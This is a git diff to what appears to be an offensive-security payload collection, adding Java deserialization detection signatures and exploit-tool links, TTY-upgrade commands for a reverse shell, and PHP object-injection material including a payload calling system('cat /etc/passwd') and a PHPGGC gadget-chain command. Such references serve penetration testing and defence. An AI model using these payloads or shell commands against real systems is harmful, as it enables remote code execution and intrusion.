diff --git a/Java Deserialization/README.md b/Java Deserialization/README.md index 48670be..50e90f8 100644 --- a/Java Deserialization/README.md +++ b/Java Deserialization/README.md @@ -1,5 +1,12 @@ # Java Deserialization +## Detection + +- "AC ED 00 05" in Hex +- "rO0" in Base64 +- Content-type = "application/x-java-serialized-object" +- "H4sIAAAAAAAAAJ" in gzip(base64) + ## Exploit [ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. @@ -54,8 +61,12 @@ Additional tools (integration ysoserial with Burp Suite): JRE8u20_RCE_Gadget [https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) +JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss) + ## Thanks to - [Github - ysoserial](https://github.com/frohoff/ysoserial) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) +- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) +- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index d7aad3c..e20ddb4 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -151,12 +151,19 @@ lua: os.execute('/bin/sh') ``` Access shortcuts, su, nano and autocomplete in a partially tty shell -/!\ OhMyZSH might break this trick +/!\ OhMyZSH might break this trick, a simple `sh` is recommended ```powershell +# in host ctrl+z stty raw -echo fg + +# in reverse shell +reset +export SHELL=bash +export TERM=xterm-256color +stty rows columns ``` (From within vi) diff --git a/PHP serialization/README.md b/PHP serialization/README.md index 765d7b9..c0dce3b 100644 --- a/PHP serialization/README.md +++ b/PHP serialization/README.md @@ -130,8 +130,25 @@ echo urlencode(serialize(new PHPObjectInjection)); //'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}' ``` +## Finding and using gadgets + +[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: + +- Laravel +- Symfony +- SwiftMailer +- Monolog +- SlimPHP +- Doctrine +- Guzzle + +```powershell +phpggc monolog/rce1 'phpinfo();' -s +``` + ## Thanks to -* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) -* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) -* [PHP unserialize](http://php.net/manual/en/function.unserialize.php) +- [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) +- [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) +- [PHP unserialize](http://php.net/manual/en/function.unserialize.php) +- [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) \ No newline at end of file